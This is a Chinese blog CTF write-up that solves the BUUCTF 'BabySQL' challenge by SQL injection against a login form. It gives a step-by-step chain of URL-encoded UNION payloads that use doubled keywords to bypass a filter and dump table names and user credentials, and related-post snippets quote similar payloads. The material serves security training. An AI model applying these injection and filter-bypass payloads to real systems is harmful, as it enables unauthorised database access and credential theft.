BUU_web [极客大挑战 2019]BabySQL

最新推荐文章于 2023-10-10 18:51:06 发布
最新推荐文章于 2023-10-10 18:51:06 发布
阅读量201 收藏 1
点赞数
分类专栏: BUU
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46635165/article/details/108844428
版权
本文详细介绍了通过SQL注入攻击进行字段探测的过程,使用Burpsuite工具构造payload,绕过关键字过滤,最终实现联合注入,揭示了数据库的结构和信息。重点讲解了URL编码在payload构造中的重要性以及双写技巧。
摘要由CSDN通过智能技术生成

打开解题网址,一个账号密码输入框,根据题目,显然是sql注入:

在这里插入图片描述
尝试以 admin ,弱密码登录:

在这里插入图片描述
发现是get传参,提示登录错误用户或密码,进行抓包,并尝试单引号报错,找到报错显示位:

在这里插入图片描述
%23尝试闭合语句,闭合成功:
在这里插入图片描述
到这里,有个一点需要注意:

  • 如果用 burpsuite 进行sql注入,那么语句里面包含的空格 或者 # 号需要进行手动url编码再写入payload,因为 burpsuite 上是直接以 url 传参,不会再对数据进行自动url编码;而如果是直接在输入框上做 sql 注入,则不用,因为输在输入框的数据会经过一次自动 url 编码,再被写入到 url 里面;

接下来我利用burpsuite (接下来的sql语句请特别注意空格和 # 号的url编码,容易看花眼),构造payload,进行字段个数查询:
空格 url 编码 : %20 # 号 url 编码 : %23
admin'%20order%20by%203%20%23

观察报错语句,发现 or, by 均被过滤,那么盲猜后台也过滤了一些注入常用的关键字union,select,from,等;

加粗样式
因此尝试 双写绕过,payload:

admin'%20oorrder%20bbyy%203%20%23

绕过成功,知道了有三个 字段 ,并发现一个这个sql语句相当于一个万能密码:
在这里插入图片描述
再使用 union 联合注入加双写绕过,观察页面显示位,显示位分别是 2 和 3:

在这里插入图片描述
接下来,在 2 和 3 两个显示位随便挑一个进行常规的联合注入即可;

值得注意的是,带有 or 两个字母的单词也需要进行 双写绕过,请看官自行体会;

all the payload:(注意 payload 里的 0 和 admin)


babysql:

admin'%20oorrder%20bbyy%203%20%23 字段为3

0'%20uunionnion%20seselectlect%201,2,3%23 显示为为 2, 3


0'%20uunionnion%20seselectlect%201,2,database()%23 当前数据库为 geek

0'%20uunionnion%20seselectlect%201,2,group_concat(table_name)%20ffromrom%20infoorrmation_schema.tables%20wwherehere%20table_schema='geek'%23 
表为 b4bsql,geekuser


0'%20uunionnion%20seselectlect%201,2,group_concat(column_name)%20ffromrom%20infoorrmation_schema.columns%20wwherehere%20table_name='b4bsql'%23 
字段名为 id,username,password

0'%20uunionnion%20seselectlect%201,2,group_concat(username,'@',passwoorrd)ffromrom%20b4bsql%23
我在干饭
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 264
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
[极客挑战 2019] web题-BabySQL
BROTHERYY的博客
07-08 268
复现环境:buuoj.cn 他又来了,上次被日了,这次还是要被日 发现被过滤了 用双写绕过 获取所有数据库 获取ctf库中所有的表 获取表内字段 获取表内数据 flag{85f76441-5982-4c33-975e-23a8f7365874}
CTF-Web-[极客挑战 2019]BabySQL
归子莫的博客
05-03 1031
CTF-Web-[极客挑战 2019]BabySQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]BabySQL 打开题目的实例 思路 当然第一步还是尝试万能密...
[PwnThyBytes 2019]Baby_SQL
SopRomeo的博客
10-16 1927
根据题目名字,测试sql注入 抓包看到源代码,猜测文件包含,测试无果 登录和注册都没有注入点 题目提示也有 既然没思路,就扫目录 buu有请求次数限制,自己写个目录扫描 发现是source.zip泄露 代码审计 index页面有个函数会进行转义 他这里转义了所有传过去的参数 看到register和login都没有啥过滤,register必须要为admin注册 可以发现登录是存在注入点的 而index那个绕过是需要GBK编码才能绕的,之前还想着看看能不能二次注入,也不行 回过头来看到这段代码 re
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BMZCTF:baby_sql
末初的CSDN博客
04-30 652
http://www.bmzclub.cn/challenges#baby_sql 简单的SQL注入,过滤了一些关键字符,但是过滤进制都是直接替换为空。有机可趁,直接双写绕过 /check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7 /check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7 /chec
BUUCTF WEB BabySql
qq_41696858的博客
09-03 303
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 201
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
web-[GXYCTF2019]BabySQli
wojiushilsy的博客
07-06 301
题目要点题目内容解题 题目要点 当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。 题目内容 解题 原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码! 查看源码search.php看到MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 base32+base64解密后得到select * from user .
web 18.babysql
yu_jing_hong的博客
09-01 138
题目提示有过滤,首先尝试万能密码登录 可以根据错误提示知道or被过滤掉了,可以尝试双写绕过 果然没这么简单得到flag,再尝试注入 猜字段,构造payload:?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1 又提示错误,肯定是union select被过滤了,双写绕过 payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &.
[极客挑战 2019]BabySQL
qq_52907838的博客
04-28 851
首先输入1'页面报错,说明存在SQL注入漏洞: 接着输入1' or 1=1#,显示: 说明or被过滤,就尝试双写绕过,输入1' oorr 1=1# 登录成功,接着判断几个字段,用1' order by 3#尝试 发现order中的or,by都被过滤,就饶过1' oorrder bbyy 3# 发现有3个字段,用联合查询1,2,3试试,发现union和select都被过滤,就都双写,确认显示的位置: 1'ununionion seselectlect 1,database().
[PwnThyBytes 2019]Baby_SQL - 代码审计+布尔盲注+SESSION_UPLOAD_PROGRESS利用
oZuoShen123的博客
10-10 233
简单的分析一下: 1、index.php中,开启了session,我们通过任何方式的传参都会经过过滤函数   过滤函数:参数值必须是字符串,其次是通过addslashes函数过滤 2、login.php,存在sql语句,并写了数据库是ptbctf,密码通过MD5的形式校验 3、register.php,用户名不允许是admin,且长度要6
极客挑战2019——baby sql
qq_44308327的博客
11-22 673
baby sql(注意双写绕过) 判断注入类型 既然是sql注入题,那就先判断注入的数据类型 payload: ?username=admin&password=1 payload: ?username=admin&password=2-1 //判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入 无变化,所以为整型注入 判断回显位 payload:?username=admin&password=1' order by 3%23 ...
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值